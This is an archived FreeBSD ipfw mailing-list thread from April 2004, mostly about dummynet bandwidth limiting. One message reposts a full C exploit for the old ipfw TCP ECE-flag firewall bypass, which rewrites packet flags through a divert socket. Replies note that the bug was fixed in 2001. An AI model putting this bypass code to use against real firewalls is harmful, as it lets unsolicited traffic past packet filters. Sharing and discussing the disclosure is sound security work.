From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 12 00:54:14 2004
Date: Mon, 12 Apr 2004 10:54:14 +0300
From: hugle
To: freebsd-ipfw@freebsd.org
Message-ID: <172205822897.20040412105414@vkt.lt>
Subject: ipfw <> ipf can I change the order packets get in?

Hello all.

I've found this patch:

    http://unia.3lo.lublin.pl/~pawmal/freebsd/ip_output-ipfw-ipf.diff

This patch should change the order in which packets go through ipfw and
ipf, i.e. which one comes first. Could someone give me a .diff for

    in:  ipfw > ipf
    out: ipf > ipfw

and a 2nd .diff for

    in:  ipf > ipfw
    out: ipfw > ipf

I mean, to translate this code into such codes :)

Thanks.
--
Best regards,
Hugle

From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 12 11:01:52 2004
Date: Mon, 12 Apr 2004 11:01:51 -0700 (PDT)
From: FreeBSD bugmaster
To: ipfw@FreeBSD.org
Message-Id: <200404121801.i3CI1pp0084796@freefall.freebsd.org>
Subject: Current problem reports assigned to you

Current FreeBSD problem reports

Critical problems

Serious problems

S Submitted    Tracker     Resp. Description
-------------------------------------------------------------------------------
o [2002/12/27] kern/46557   ipfw  ipfw pipe show fails with lots of queues
o [2003/04/22] kern/51274   ipfw  ipfw2 create dynamic rules with parent nu
f [2003/04/24] kern/51341   ipfw  ipfw rule 'deny icmp from any to any icmp
o [2004/03/03] misc/63724   ipfw  IPFW2 Queues dont t work
o [2004/03/13] kern/64240   ipfw  IPFW tee terminates rule processing

5 problems total.

Non-critical problems

S Submitted    Tracker     Resp. Description
-------------------------------------------------------------------------------
a [2001/04/13] kern/26534   ipfw  Add an option to ipfw to log gid/uid of w
o [2002/12/07] kern/46080   ipfw  [PATCH] logamount in ipfw2 does not defau
o [2002/12/10] kern/46159   ipfw  ipfw dynamic rules lifetime feature
o [2002/12/27] kern/46564   ipfw  IPFilter and IPFW processing order is not
o [2003/02/11] kern/48172   ipfw  ipfw does not log size and flags
o [2003/03/10] kern/49086   ipfw  [patch] Make ipfw2 log to different syslo
o [2003/03/12] bin/49959    ipfw  ipfw tee port rule skips parsing next rul
o [2003/04/09] bin/50749    ipfw  ipfw2 incorrectly parses ports and port r
o [2003/08/25] kern/55984   ipfw  [patch] time based firewalling support fo
o [2003/12/29] kern/60719   ipfw  ipfw: Headerless fragments generate cryp
o [2004/01/12] kern/61259   ipfw  [patch] make "ipfw tee" work as intended
o [2004/02/09] kern/62598   ipfw  no logging on ipfw loadable module
o [2004/03/08] kern/63961   ipfw  ipfw2 uid matching doesn't work correctly

13 problems total.
From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 08:06:30 2004
Date: Tue, 13 Apr 2004 17:06:16 +0200 (CEST)
From: Ludo Koren
To: ipfw@FreeBSD.org
Message-Id: <200404131506.i3DF6G20031890@lk106.tempest.sk>
Subject: limiting bandwith

Hi.

I am running ipfw on 5.2.1-RELEASE-p1.

The relevant part of the ipfw configuration follows:

    add check-state
    pipe 10 config bw 64Kbit/s
    pipe 20 config bw 256Kbit/s
    pipe 30 config bw 8Kbit/s
    queue 10 config pipe 10 weight 100
    queue 20 config pipe 20 weight 1
    queue 30 config pipe 30 weight 1
    ....

    # Allow SMTP
    add pass tcp from A to B 25 keep-state
    add pass tcp from B to A dst-port 25 in via xl0
    add pass tcp from A 25 to B in recv xl1
    add pipe 20 tcp from B to A dst-port 25 out xmit xl1 keep-state
    add pass tcp from C to B 25 keep-state
    add pass tcp from B to C dst-port 25 in via xl0
    add pass tcp from C 25 to B in recv xl1
    add pipe 20 tcp from B to C dst-port 25 out xmit xl1 keep-state

where the A, B, C addresses are not assigned to local interfaces. The
xl0 is on the local LAN, the xl1 is connected to the router and WAN. If
I watch packets (netstat -w 10 -I xl1) flowing through xl1, I see the
numbers are correct (~32000 bytes per second). MRTG on the router shows
just half the throughput, i.e. 128Kb/s. If I reconfigure pipe 20 to
512Kbit/s or 0Kbit/s, MRTG shows 256Kbit/s.

Could you point out to me what I did wrong?

Thank you very much in advance.
lk

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 09:17:39 2004
Date: Tue, 13 Apr 2004 09:17:34 -0700
From: Luigi Rizzo
To: Ludo Koren
cc: ipfw@freebsd.org
Message-ID: <20040413091734.A98975@xorpc.icir.org>
In-Reply-To: <200404131506.i3DF6G20031890@lk106.tempest.sk>
Subject: Re: limiting bandwith

I think it is pilot error.

Be warned that dynamic rules only match addresses and ports, so once a
rule is installed it will match traffic both in and out. If you want to
select on other attributes you have to do it before you hit any
keep-state or check-state rule.

I don't know if it matches recent reports about dummynet on 5.2.1 giving
half the bandwidth, but I just checked locally and it does work as
expected -- the bandwidth is correct (with a correct ipfw config, that
is :)

	cheers
	luigi

On Tue, Apr 13, 2004 at 05:06:16PM +0200, Ludo Koren wrote:
> [...]
>
> _______________________________________________
> freebsd-ipfw@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw
> To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org"

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 09:53:33 2004
Date: Tue, 13 Apr 2004 18:53:21 +0200 (CEST)
From: Ludo Koren
To: rizzo@icir.org
Message-Id: <200404131653.i3DGrLb7057734@lk106.tempest.sk>
In-reply-to: <20040413091734.A98975@xorpc.icir.org>
cc: ipfw@freebsd.org
Subject: Re: limiting bandwith

> i think it is pilot error.

I do not argue. Yes, it probably is.

> Be warned that dynamic rules only match addresses and ports, so
> once a rule is installed it will match traffic both in and out.
> If you want to select on other attributes you have to do it
> before you hit any keep-state or check-state rule.

> I don't know if it matches recent reports about dummynet on
> 5.2.1 giving half the bandwidth, but i just checked locally and
> it does work as expected -- the bandwidth is correct (with a
> correct ipfw config, that is :)

I just cannot put together rules that do what I want. If I omit
keep-state from the rule:

    add pipe 20 tcp from B to A dst-port 25 out xmit xl1 keep-state

it stops working. Basically, I am lost...

> cheers
> luigi

lk

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 10:09:11 2004
Date: Tue, 13 Apr 2004 12:09:05 -0500
From: "Jack L. Stone"
To: Luigi Rizzo, Ludo Koren
cc: ipfw@freebsd.org
Message-Id: <3.0.5.32.20040413120905.01f334c8@10.0.0.15>
In-Reply-To: <20040413091734.A98975@xorpc.icir.org>
Subject: Re: limiting bandwith

TopPost:

Hi, Luigi & List:

Pardon me for tagging along on this thread, but my question is somewhat
related.

Being a newbie to using dummynet, I haven't yet figured how to choose &
apply the proper "weight" which ranges from 1-100. The man pages are very
brief on this and I haven't seen anything else in my searches.
Any tips appreciated....

Best regards,

Jack L. Stone, Administrator
Sage American
http://www.sage-american.com
jacks@sage-american.com

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 10:13:46 2004
Date: Tue, 13 Apr 2004 10:13:46 -0700
From: Luigi Rizzo
To: "Jack L. Stone"
cc: Ludo Koren
cc: ipfw@freebsd.org
Message-ID: <20040413101346.B98975@xorpc.icir.org>
In-Reply-To: <3.0.5.32.20040413120905.01f334c8@10.0.0.15>
Subject: Re: limiting bandwith

On Tue, Apr 13, 2004 at 12:09:05PM -0500, Jack L. Stone wrote:
> TopPost:
> Hi, Luigi & List:
> Pardon me for tagging along on this thread, but my question is somewhat
> related.
>
> Being a newbie to using dummynet, I haven't yet figured how to choose &
> apply the proper "weight" which ranges from 1-100. The man pages are very
> brief on this and I haven't seen anything else in my searches.

Weights are only relative to each other; they are not absolute values.
The only thing that counts is the ratio among queues connected to the
same pipe, so pick what you like.

	cheers
	luigi

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 13 19:25:53 2004
Date: Tue, 13 Apr 2004 22:25:43 -0400
From: "Thomas S. Crum - AAA Web Solution, Inc."
To: "'Jack L. Stone'"
cc: ipfw@freebsd.org
Message-ID: <003401c421c7$ccf8c340$6466a8c0@wolf>
In-Reply-To: <3.0.5.32.20040413120905.01f334c8@10.0.0.15>
Subject: RE: limiting bandwith

Also, Luigi has a helpful tutorial at

    http://info.iet.unipi.it/~luigi/ip_dummynet/

Best,

Thomas S. Crum
Senior Technical Associate
tscrum@aaawebsolution.com
Toll-free: (800) 834-0626
AAA Web Solution, Inc.
11924 W Forest Hill Boulevard
Building 22 - Mailstop 200
Wellington, FL 33414 USA

Providing full-service website design, maintenance, hosting, and marketing.
No task is too small or enterprise too large for us to help you!

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 01:20:02 2004
Date: Wed, 14 Apr 2004 11:19:43 +0000
From: Dmitry Surovtsev
To: freebsd-ipfw@freebsd.org
Message-ID: <407D1E4F.4000500@buc.com.ua>
Subject: IPFW ECE Firewall Bypassing Exploit
securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html):

A vulnerability in FreeBSD's implementation of packet filtering for IPv4
and IPv6 has been found. The vulnerability allows specially crafted
packets that are not part of an established connection to go through the
firewall. These special packets must have the ECE flag set, which is in
the TCP reserved options field.

Details

Exploit:

/*
 * FreeBSD ipfw + TCP ECE flag exploit.
 * Plathond for Sensepost 2001/01/25
 */

/*
 * The archived copy lost the header names from the original 49 #include
 * lines; the headers listed here are the ones this code actually uses
 * (reconstructed for FreeBSD).
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DIVERT_PORT 7000
#define FALSE 0
#define TRUE 1

#define CKSUM_CARRY(x) \
    (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))

typedef unsigned char Boolean;

static unsigned char pbuf[IP_MAXPACKET];
static unsigned long plen = 0;
static int psock = -1;
static struct sockaddr_in paddr;

/*
 * These are stolen from libnet.
 */
int
in_cksum(u_short *addr, int len)
{
    int sum;
    int nleft;
    u_short ans;
    u_short *w;

    sum = 0;
    ans = 0;
    nleft = len;
    w = addr;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    if (nleft == 1) {
        *(u_char *)(&ans) = *(u_char *)w;
        sum += ans;
    }
    return (sum);
}

void
do_cksum(unsigned char *buf, int protocol, int len)
{
    struct ip *ip;
    unsigned long ip_hl = 0;
    unsigned long sum = 0;

    ip = (struct ip *)buf;
    ip_hl = ip->ip_hl << 2;

    switch (protocol) {
    case IPPROTO_TCP: {
        struct tcphdr *tcp;

        tcp = (struct tcphdr *)(buf + ip_hl);
        tcp->th_sum = 0;
        /* pseudo-header: source/destination address, protocol, TCP length */
        sum = in_cksum((u_short *)&(ip->ip_src), 8);
        sum += ntohs(IPPROTO_TCP + len);
        sum += in_cksum((u_short *)tcp, len);
        tcp->th_sum = CKSUM_CARRY(sum);
        break;
    }
    default:
        return;
    }
    return;
}

void
flushpacket(int fd)
{
    int nR;

    nR = sendto(fd, pbuf, plen, 0, (struct sockaddr *)&paddr, sizeof(paddr));
    if (nR != (int)plen) {
        if (errno == ENOBUFS)
            return;         /* psock stays set: retried when writable */
        if (errno == EMSGSIZE) {
            fprintf(stderr, "Need to implement frag.\n");
            return;
        } else {
            fprintf(stderr, "Failed to write packet.\n");
            return;
        }
    }
    psock = -1;
}

void
handle_input(int sock)
{
    int nR = 0;
    socklen_t addrsize = 0;
    struct ip *ip;
    Boolean fIsOutput = FALSE;
    unsigned int ip_hl = 0, tcp_hl = 0;
    unsigned int ip_data_len = 0;
    struct tcphdr *tcp = NULL;

    addrsize = sizeof(struct sockaddr_in);
    nR = recvfrom(sock, pbuf, sizeof(pbuf), 0,
        (struct sockaddr *)&paddr, &addrsize);
    if (nR == -1) {
        if (errno != EINTR)
            fprintf(stderr, "Warning : recvfrom() failed.\n");
        goto over;
    }

    ip = (struct ip *)pbuf;
    ip_hl = ip->ip_hl << 2;

    /* Check if this is input or output */
    if (paddr.sin_addr.s_addr == INADDR_ANY)
        fIsOutput = TRUE;
    else
        fIsOutput = FALSE;

    /* We are only handling TCP packets */
    if (ip->ip_p != IPPROTO_TCP)
        goto over;

    /* Get the TCP header */
    tcp = (struct tcphdr *)(pbuf + ip_hl);
    tcp_hl = tcp->th_off << 2;
    ip_data_len = ntohs(ip->ip_len) - ip_hl;

    /* Sanity check packet length */
    if ((int)ip_data_len <= 0)
        goto over;

    /* Add ECE (0x40) and CWR (0x80) flags to TCP header */
    tcp->th_flags |= (0x40 | 0x80);

    /* Compute new checksum */
    do_cksum(pbuf, IPPROTO_TCP, ip_data_len);

    /* Write packet back */
    plen = nR;
    psock = sock;
    flushpacket(sock);

over:
    return;
}

int
main(int argc, char **argv)
{
    int inoutsock = -1;
    fd_set rfs, wfs;
    int fdmax = -1;
    struct sockaddr_in addr;
    int rc;

    /* Create divert sockets */
    if ((inoutsock = socket(PF_INET, SOCK_RAW, IPPROTO_DIVERT)) == -1) {
        fprintf(stderr, "socket() failed, exiting\n");
        exit(1);
    }

    /* Bind socket */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(DIVERT_PORT);
    if (bind(inoutsock, (struct sockaddr *)&addr,
        sizeof(struct sockaddr_in)) == -1) {
        fprintf(stderr, "Unable to bind socket, exiting\n");
        exit(1);
    }

    while (1) {
        FD_ZERO(&rfs);
        FD_ZERO(&wfs);
        if (psock != -1)
            FD_SET(psock, &wfs);
        FD_SET(inoutsock, &rfs);
        if (inoutsock > psock)
            fdmax = inoutsock;
        else
            fdmax = psock;

        /* Select loop */
        rc = select(fdmax + 1, &rfs, &wfs, NULL, NULL);
        if (rc == -1) {
            if (errno == EINTR)
                continue;
            fprintf(stderr, "select() failed, exiting\n");
            exit(1);
        }

        /* Check for flush from previous packet */
        if (psock != -1) {
            if (FD_ISSET(psock, &wfs))
                flushpacket(psock);
        }

        /* Do we have input available ? */
        if (FD_ISSET(inoutsock, &rfs)) {
            /* Yip, handle it */
            handle_input(inoutsock);
        }
    }
}

/* spidermark sensepostdata ece*/

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 02:35:00 2004
Date: Wed, 14 Apr 2004 10:34:55 +0100
From: Colin Percival
To: freebsd-security@freebsd.org
cc: freebsd-ipfw@freebsd.org
Message-Id: <6.0.1.1.1.20040414102727.03ad0008@imap.sfu.ca>
Subject: FYI re: "FreeBSD ECE flag ipfw protection bypass"

Several people have noticed that SecuriTeam.com is reporting a "FreeBSD
ECE flag ipfw protection bypass" exploit. In an effort to save time, let
me say this publicly: SecuriTeam.com is three years out of date. This
problem was fixed in FreeBSD 3.5-STABLE and 4.2-STABLE in January 2001,
and reported in Security Advisory FreeBSD-SA-01:08.

Colin Percival

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 04:27:23 2004
Date: Wed, 14 Apr 2004 13:23:38 +0200
From: "Devon H. O'Dell"
To: sd@buc.com.ua
cc: freebsd-ipfw@freebsd.org
Message-ID: <407D1F3A.6070607@offmyserver.com>
In-Reply-To: <407D1E4F.4000500@buc.com.ua>
Subject: Re: IPFW ECE Firewall Bypassing Exploit

Dmitry Surovtsev wrote:
> securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html):
>
> A vulnerability in FreeBSD's implementation of packet filtering for IPv4
> and IPv6 has been found. The vulnerability allows specially crafted
> packets that are not part of an established connection to go through the
> firewall. These special packets must have the ECE flag set, which is in
> the TCP reserved options field.
>
> [snip]

Hello Dmitry,

This bug was fixed circa three years ago. Please see the date on the
exploit.

Kind regards,
Devon H. O'Dell

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 04:42:12 2004
Date: Wed, 14 Apr 2004 13:41:54 +0200 (CEST)
From: Ludo Koren
To: rizzo@icir.org
cc: jacks@sage-american.com
cc: ipfw@freebsd.org
cc: tscrum@aaawebsolution.com
Message-Id: <200404141141.i3EBfsER088462@lk106.tempest.sk>
In-reply-to: <20040413101346.B98975@xorpc.icir.org>
Subject: Re: limiting bandwith
Maybe I should re-state my original question. The FreeBSD machine with ipfw
is routing and filtering. I need to limit and weight data flow, i.e. if an
interactive session exists, I need fixed bandwidth and asap processing.
Batch jobs, like SMTP, may be postponed and processed if the bandwidth is
free. In addition, I need to NAT the `interactive' addresses.

Could anybody point me to a working example? Everything I find is too
general or briefly described.

Thank you very much in advance.

Regards,

lk

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 05:36:18 2004
From: "Thomas S. Crum - AAA Web Solution, Inc."
Date: Wed, 14 Apr 2004 08:36:03 -0400
To: "'Ludo Koren'"
Cc: ipfw@freebsd.org
Subject: RE: limiting bandwith
Message-ID: <004e01c4221d$12e96c60$6466a8c0@wolf>
In-Reply-To: <200404141141.i3EBfsER088462@lk106.tempest.sk>

I do not believe there is a way to "postpone" traffic with dummynet other
than what is available with queues, not to mention I don't think you'd ever
want to, really. The config below will give mail a lower priority than all
of the other traffic, both in and out.

NAT interactive addresses? Hmmm... you mean you want ipfw to forward local
addresses using NAT? You want to dole out local IP addresses, DHCP? Not
really sure of the question here, but I'm sure it's answered by following
the link below to the FreeBSD handbook.

http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html

# This is a ruleset that will give mail a lower priority than all other
# packets. Pipes are configured assuming you have a T1 Internet connection
# and would like to use the bandwidth as shown. Salt to taste from here.

# APPLIES TO INCOMING PACKETS (DOWNLOADS)
ipfw add queue 1 tcp from any to 10.1.2.0/24 25,110
ipfw queue 1 config weight 1 pipe 1 mask dst-ip 0x000000ff
ipfw add queue 2 ip from any to 10.1.2.0/24
ipfw queue 2 config weight 5 pipe 1 mask dst-ip 0x000000ff
ipfw pipe 1 config bw 1000Kbit/s

# APPLIES TO OUTGOING PACKETS (UPLOADS)
ipfw add queue 3 tcp from 10.1.2.0/24 25,110 to any
ipfw queue 3 config weight 1 pipe 2 mask src-ip 0x000000ff
ipfw add queue 4 ip from 10.1.2.0/24 to any
ipfw queue 4 config weight 5 pipe 2 mask src-ip 0x000000ff
ipfw pipe 2 config bw 500Kbit/s

Best,

Thomas S. Crum
Senior Technical Associate
tscrum@aaawebsolution.com
Toll-free: (800) 834-0626
AAA Web Solution, Inc.
11924 W Forest Hill Boulevard
Building 22 - Mailstop 200
Wellington, FL 33414 USA
Providing full-service website design, maintenance, hosting, and marketing.
No task is too small or enterprise too large for us to help you!

-----Original Message-----
From: owner-freebsd-ipfw@freebsd.org [mailto:owner-freebsd-ipfw@freebsd.org] On Behalf Of Ludo Koren
Sent: Wednesday, April 14, 2004 7:42 AM
To: rizzo@icir.org
Cc: jacks@sage-american.com; ipfw@freebsd.org; tscrum@aaawebsolution.com
Subject: Re: limiting bandwith

Maybe I should re-state my original question. The FreeBSD machine with ipfw
is routing and filtering. I need to limit and weight data flow, i.e. if an
interactive session exists, I need fixed bandwidth and asap processing.
Batch jobs, like SMTP, may be postponed and processed if the bandwidth is
free. In addition, I need to NAT the `interactive' addresses.

Could anybody point me to a working example? Everything I find is too
general or briefly described.

Thank you very much in advance.
Regards,

lk

_______________________________________________
freebsd-ipfw@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw
To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org"

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 06:09:16 2004
From: Dmitry Surovtsev
Date: Wed, 14 Apr 2004 16:08:48 +0000
To: "Devon H. O'Dell"
Cc: freebsd-ipfw@freebsd.org
Subject: Re: IPFW ECE Firewall Bypassing Exploit
Message-ID: <407D6210.1070202@buc.com.ua>
In-Reply-To: <407D1F3A.6070607@offmyserver.com>

Thanks, that's right, ouhh ;-) I do not know why securiteam.com dated it
_14 Apr 2004_.

Devon H. O'Dell wrote:
> Dmitry Surovtsev wrote:
>
>> securiteam news (http://www.securiteam.com/exploits/5CP0B0UCKU.html):
>>
>> A vulnerability in FreeBSD's implementation of packet filtering for IPv4
>> and IPv6 has been found. The vulnerability allows specially crafted
>> packets that are not part of an established connection to go through the
>> firewall. These special packets must have the ECE flag set, which is in
>> the TCP reserved options field.
>>
>> [snip]
>
> Hello Dmitry,
>
> This bug was fixed circa three years ago. Please see the date on the
> exploit.
>
> Kind regards,
>
> Devon H. O'Dell

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 07:51:58 2004
From: Ludo Koren
Date: Wed, 14 Apr 2004 16:51:45 +0200 (CEST)
To: tscrum@aaawebsolution.com
Cc: ipfw@freebsd.org
Subject: Re: limiting bandwith
Message-Id: <200404141451.i3EEpjJH069188@lk106.tempest.sk>
In-reply-to: <004e01c4221d$12e96c60$6466a8c0@wolf> (tscrum@aaawebsolution.com)

> I do not believe there is a way to "postpone" traffic with
> dummynet other than what is available with queues, not to
> mention I don't think you'd ever want to, really. The config
> below will give mail a lower priority to all of the other
> traffic, both in and out.

> Nat interactive addresses? Hmmm... you mean you want ipfw to
> forward local addresses using nat? you want to dole out local
> ip addresses, dhcp? Not really sure of the question here, but
> I'm sure its answered by following the link below to the
> freebsd handbook.

I wrote `interactive' (ticks), and I meant addresses that are used to
connect to ssh, web, etc. (interactive processes). All these addresses are
NAT-ed. For these, your setup is working fine. Thank you very much.

The problem I still have is the following: the SMTP is flowing through, I
am not relaying e-mail on this host. It seems to me I cannot put together a
rule which passes the traffic and adds it to the queue except when I use
the keep-state flag. In this setup (keep-state), Luigi wrote it does not
work.
Regards,

lk

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 07:56:45 2004
From: Luigi Rizzo
Date: Wed, 14 Apr 2004 07:56:44 -0700
To: Ludo Koren
Cc: ipfw@freebsd.org, tscrum@aaawebsolution.com
Subject: Re: limiting bandwith
Message-ID: <20040414075644.A95599@xorpc.icir.org>
In-Reply-To: <200404141451.i3EEpjJH069188@lk106.tempest.sk>

On Wed, Apr 14, 2004 at 04:51:45PM +0200, Ludo Koren wrote:
> > I do not believe there is a way to "postpone" traffic with
> > dummynet other than what is available with queues, not to
> > mention I don't think you'd ever want to, really. The config
> > below will give mail a lower priority to all of the other
> > traffic, both in and out.
>
> > Nat interactive addresses? Hmmm... you mean you want ipfw to
> > forward local addresses using nat? you want to dole out local
> > ip addresses, dhcp? Not really sure of the question here, but
> > I'm sure its answered by following the link below to the
> > freebsd handbook.
>
> I wrote `interactive' (ticks), and I meant addresses that are used to
> connect to ssh, web, etc (interactive processes). All these addresses
> are NAT-ed. For these, your setup is working fine. Thank you very
> much.
>
> The problem, I still have, is the following: the SMTP is flowing
> through, I am not relaying e-mail on this host. It seems to me, I
> cannot put together a rule which pass the traffic and add it to the
> queue except when I use keep-state flag. In this setup (keep-state),
> Luigi wrote it does not work.

i said your configuration does not work the way you want.
It is possible to write a proper configuration that does what
you want but it is left as an exercise to the reader.

cheers
luigi

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 08:13:39 2004
From: Ludo Koren
Date: Wed, 14 Apr 2004 17:13:27 +0200 (CEST)
To: rizzo@icir.org
Cc: ipfw@freebsd.org, tscrum@aaawebsolution.com
Subject: Re: limiting bandwith
Message-Id: <200404141513.i3EFDR5R084225@lk106.tempest.sk>
In-reply-to: <20040414075644.A95599@xorpc.icir.org> (message from Luigi Rizzo on Wed, 14 Apr 2004 07:56:44 -0700)

>> I wrote `interactive' (ticks), and I meant addresses that are
>> used to connect to ssh, web, etc (interactive processes). All
>> these addresses are NAT-ed. For these, your setup is working
>> fine. Thank you very much.
>>
>> The problem, I still have, is the following: the SMTP is
>> flowing through, I am not relaying e-mail on this host. It
>> seems to me, I cannot put together a rule which pass the
>> traffic and add it to the queue except when I use keep-state
>> flag. In this setup (keep-state), Luigi wrote it does not work.

> i said your configuration does not work the way you want. It
> is possible to write a proper configuration that does what you
> want but it is left as an exercise to the reader.

That I had understood. The problem is, the exercise I don't know how to
do, even though I tried hard for several days... call me stupid...

The setup is: pass 2 mail servers without NAT and add the traffic from the
LAN to the WAN to the queue and limit it (or weight it). If I add:

ipfw add queue 3 tcp from A to B 25
ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff
ipfw pipe 10 config bw 256Kbit/s

and remove all rules with keep-state, it stops working.

> cheers
> luigi

Regards,

lk

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 09:43:59 2004
From: "Thomas S. Crum - AAA Web Solution, Inc."
Date: Wed, 14 Apr 2004 12:43:45 -0400
To: "'Ludo Koren'"
Cc: ipfw@freebsd.org
Subject: RE: limiting bandwith
Message-ID: <001201c4223f$ad443930$6466a8c0@wolf>
In-reply-to: <200404141513.i3EFDR5R084225@lk106.tempest.sk>
Using keep-state "is" the most efficient way to do it. The config that I
sent would still allow SMTP and POP through, but limited as to the weight
of the queue. Maybe I am misunderstanding what you are saying.

Are you saying that the mail is traversing unabated by the ruleset?

Best,

Thomas S. Crum
Senior Technical Associate
tscrum@aaawebsolution.com
Toll-free: (800) 834-0626
AAA Web Solution, Inc.

-----Original Message-----
From: owner-freebsd-ipfw@freebsd.org [mailto:owner-freebsd-ipfw@freebsd.org] On Behalf Of Ludo Koren
Sent: Wednesday, April 14, 2004 11:13 AM
To: rizzo@icir.org
Cc: ipfw@freebsd.org; tscrum@aaawebsolution.com
Subject: Re: limiting bandwith

>> I wrote `interactive' (ticks), and I meant addresses that are
>> used to connect to ssh, web, etc (interactive processes). All
>> these addresses are NAT-ed. For these, your setup is working
>> fine. Thank you very much.
>>
>> The problem, I still have, is the following: the SMTP is
>> flowing through, I am not relaying e-mail on this host. It
>> seems to me, I cannot put together a rule which pass the
>> traffic and add it to the queue except when I use keep-state
>> flag. In this setup (keep-state), Luigi wrote it does not work.

> i said your configuration does not work the way you want. It
> is possible to write a proper configuration that does what you
> want but it is left as an exercise to the reader.

That I had understood. The problem is, the exercise I don't know how to
do, even though I tried hard for several days... call me stupid...

The setup is: pass 2 mail servers without NAT and add the traffic from the
LAN to the WAN to the queue and limit it (or weight it). If I add:

ipfw add queue 3 tcp from A to B 25
ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff
ipfw pipe 10 config bw 256Kbit/s

and remove all rules with keep-state, it stops working.

> cheers
> luigi

Regards,

lk

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 11:26:04 2004
From: Lucian Lungu
Date: Wed, 14 Apr 2004 11:26:01 -0700 (PDT)
To: freebsd-ipfw@freebsd.org
Subject: ipfw dummynet advice
Message-ID: <20040414182601.70010.qmail@web60101.mail.yahoo.com>

> I need help because I can't manage the problem.
> I have a 290 kbit/s bandwidth Internet connection on
> interface rl1 and a LAN with 50 users on interface
> rl0...
> I used ipfw to let only HTTP working over the
> squid...
> no other traffic because the bw is small.
>
> I want to make a dynamic limitation with dummynet or,
> if it doesn't work, a static one per each user... I
> tried different firewall settings like those under,
> but when I get the bw limit on downloads, the pages
> load too slow...
>
> pipe 1 config bw 28Kbit/s delay 5ms mask dst-ip 0xffffffff
> add pipe 1 ip from any to any out recv rl1
>
> and
>
> add queue 1 ip from any to 10.0.0.1/16 out recv rl1
> queue 1 config weight 3 pipe 1 mask dst-ip 0x000000ff
> pipe 1 config bw 28Kbit/s
>
> I need to know how to configure the bw in the
> conditions above...
>
> Regards,

=====
Lucian Lungu
Timisoara, Romania

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:12:15 2004
From: "Matthew McGehrin"
Date: Wed, 14 Apr 2004 16:12:11 -0400
Subject: Re: limiting bandwith
Message-ID: <001a01c4225c$c54d2740$af00a8c0@orange>
References: <200404141513.i3EFDR5R084225@lk106.tempest.sk>

Wouldn't it just make better sense to do the following:

ipfw add 10 pipe 10 tcp from A to B 25
ipfw pipe 10 config bw 256k queue 8k mask dst-ip 0xff000000
ipfw add 1000 pass tcp from A to B 25 setup

-- Matthew

----- Original Message -----
From: "Ludo Koren"
Sent: Wednesday, April 14, 2004 11:13 AM
Subject: Re: limiting bandwith

> ipfw add queue 3 tcp from A to B 25
> ipfw queue 3 config weight 1 pipe 10 mask src-ip 0x000000ff
> ipfw pipe 10 config bw 256Kbit/s

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:19:27 2004
From: Ludo Koren
Date: Wed, 14 Apr 2004 22:19:14 +0200 (CEST)
To: tscrum@aaawebsolution.com
Cc: ipfw@freebsd.org
Subject: Re: limiting bandwith
Message-Id: <200404142019.i3EKJEmT081498@lk106.tempest.sk>
In-reply-to: <001201c4223f$ad443930$6466a8c0@wolf> (tscrum@aaawebsolution.com)

> Using keep-state "is" the most efficient way to do it. The
> config that I sent would still allow smtp and pop through, but
> limited as to the weight of the queue. Maybe I am
> misunderstanding what you are saying.

> Are you saying that the mail is traversing unabated by the
> ruleset?

No. It seems, when I am using the rule with the keep-state flag, each
packet is counted twice. So if I set bw to 256Kbit/s, I get only
128Kbit/s. Luigi wrote that in keep-state rules the in, out, xmit rule
flags are not valid, if I understood him correctly...

Regards,

lk

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 14 13:38:30 2004
From: Luigi Rizzo
Date: Wed, 14 Apr 2004 13:38:28 -0700
To: Ludo Koren
Cc: ipfw@freebsd.org, tscrum@aaawebsolution.com
Subject: Re: limiting bandwith
Message-ID: <20040414133828.A16025@xorpc.icir.org>
In-Reply-To: <200404142019.i3EKJEmT081498@lk106.tempest.sk>

On Wed, Apr 14, 2004 at 10:19:14PM +0200, Ludo Koren wrote:
> > Using keep-state "is" the most efficient way to do it. The
> > config that I sent would still allow smtp and pop through, but
> > limited as to the weight of the queue. Maybe I am
> > misunderstanding what you are saying.
>
> > Are you saying that the mail is traversing unabated by the
> > ruleset?
>
> No.
> It seems, when I am using the rule with keep-state flag, each
> packet is counted twice. So if I set bw to 256Kbit/s, I get only
